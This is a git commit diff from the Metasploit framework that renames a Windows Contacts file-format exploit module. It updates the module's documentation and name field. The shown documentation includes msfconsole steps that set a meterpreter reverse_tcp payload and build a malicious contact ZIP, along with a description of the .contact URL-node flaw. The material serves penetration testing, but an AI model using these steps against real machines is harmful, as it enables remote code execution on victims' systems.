Renamed module from 'microsoft_windows_contact_remote_code_execution' to 'microsoft_windows_contact'

master
asoto-r7 2019-04-10 17:17:50 -05:00
parent 324f2f0939
commit 94785dabbb
No known key found for this signature in database
GPG Key ID: F531810B7FE55396
2 changed files with 7 additions and 7 deletions

View File

@ -26,7 +26,7 @@ Windows Contacts
## Verification Steps
1. `./msfconsole`
2. `use exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution`
2. `use exploit/windows/fileformat/microsoft_windows_contact`
3. Configure the payload. For example: `set PAYLOAD windows/x64/meterpreter/bind_tcp`
4. Configure the payload parameters. For example: `set LHOST 192.168.1.1`
5. Enter the name of the user to be embedded in the contact, which will also be used as the filename for the .ZIP and .CONTACTS files. For example, `set FILENAME John Smith`
@ -41,19 +41,19 @@ Windows Contacts
1. Configure the module-specific settings.
```
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set WEBSITE metasploit.com
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set WEBSITE metasploit.com
WEBSITE => metasploit.com
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FILENAME John Smith
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set FILENAME John Smith
FILENAME => John Smith
```
2. Configure the payload.
```
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set LHOST 192.168.1.148
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set LHOST 192.168.1.148
LHOST => 192.168.1.148
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > run
msf5 exploit(windows/fileformat/microsoft_windows_contact) > run
[+] Creating 'John Smith.zip'
```

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows Contact File Remote Code Execution',
'Name' => 'Microsoft Windows Contact File Format Arbitary Code Execution',
'Description' => %q{
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an